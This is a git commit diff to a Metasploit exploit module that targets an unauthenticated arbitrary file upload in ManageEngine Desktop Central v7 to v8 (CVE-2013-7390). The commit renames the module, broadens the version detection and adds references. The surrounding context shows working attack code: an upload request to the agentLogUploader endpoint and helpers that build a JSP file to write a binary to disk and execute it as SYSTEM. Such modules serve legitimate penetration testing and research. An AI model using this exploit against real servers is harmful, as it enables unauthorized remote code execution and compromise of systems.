Refactor and rename desktopcentra_file_upload

- Rewrite check method - Declare that v7 is also exploitable (tested and it works) - Rename to dc_agentlogupload_file_upload to match the other DC module's naming convention - Add CVE / OSVDB / Full disclosure references
2014-09-02 23:12:33 +01:00 · 2014-09-02 23:12:33 +01:00 · d69049008c
parent 9e8658268b
commit d69049008c
1 changed files with 34 additions and 22 deletions
--- a/modules/exploits/windows/http/dc_agentlogupload_file_upload.rb
+++ b/modules/exploits/windows/http/dc_agentlogupload_file_upload.rb
@ -15,11 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'DesktopCentral AgentLogUpload Arbitrary File Upload',
+      'Name'           => 'ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload',
      'Description'    => %q{
-        This module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0
-        below  build 80293. A malicious user can upload a JSP file into the web root without
-        authentication, leading to arbitrary code execution.
+        This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to
+        v8 build 80293. A malicious user can upload a JSP file into the web root without
+        authentication, leading to arbitrary code execution as SYSTEM.
      },
      'Author'         =>
        [
@ -28,13 +28,16 @@ class Metasploit3 < Msf::Exploit::Remote
      'License'        => MSF_LICENSE,
      'References'     =>
        [
-          [ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ]
+          [ 'CVE', '2013-7390' ],
+          [ 'OSVDB', '100008' ],
+          [ 'URL', 'http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2013/Nov/130' ],
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
-          [ 'ManageEngine DesktopCentral 8 server / Windows', {} ]
+          [ 'Desktop Central v7 - v8 build 80292 / Windows', {} ]
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
@ -44,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
    register_options([Opt::RPORT(8020)], self.class)
  end

+
  def upload_file(filename, contents)
    res = send_request_cgi({
      'uri'       => normalize_uri('agentLogUploader'),
@ -65,34 +69,39 @@ class Metasploit3 < Msf::Exploit::Remote
    end
  end

+
  def check
+    # Test for Desktop Central
    res = send_request_cgi({
-        'uri' => normalize_uri("configurations.do"),
-        'method' => 'GET'
+      'uri' => normalize_uri("configurations.do"),
+      'method' => 'GET'
    })

-    if res and res.code == 200 and res.body.to_s =~ /ManageEngine Desktop Central 8/ and res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/
-      build = $1
-      print_status("Manage Desktop Central 8 build #{build} found")
+    if res and res.code == 200
+      build = "0"
+      if res.body.to_s =~ /ManageEngine Desktop Central 7/ or
+       res.body.to_s =~ /ManageEngine Desktop Central MSP 7/                    # DC v7
+        print_status("#{peer} - Detected Desktop Central v7")
+      elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ or
+       res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
+        if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/                 # DC v8 (later versions)
+          build = $1
+          print_status("#{peer} - Detected Desktop Central v8 #{build}")
+        else                                                                    # DC v8 (earlier versions)
+          print_status("#{peer} - Detected Desktop Central v8")
+        end
+      elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/                # DC v9 (and higher?)
+        build = $1
+      end
      if build < "80293"
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Safe
      end
    end
-
-    res = send_request_cgi({
-      'uri' => normalize_uri("agentLogUploader"),
-      'method' => 'POST'
-    })
-
-    if res and res.code == 200
-      return Exploit::CheckCode::Detected
-    end
-
-    return Exploit::CheckCode::Safe
  end

+
  def exploit
    print_status("#{peer} - Uploading JSP to execute the payload")

@ -117,6 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
    })
  end

+
  def jsp_drop_bin(bin_data, output_file)
    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
@ -144,6 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
    jspraw
  end

+
  def jsp_execute_command(command)
    jspraw =  %Q|\n|
    jspraw << %Q|<%\n|
@ -153,6 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
    jspraw
  end

+
  def jsp_drop_and_execute(bin_data, output_file)
    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
  end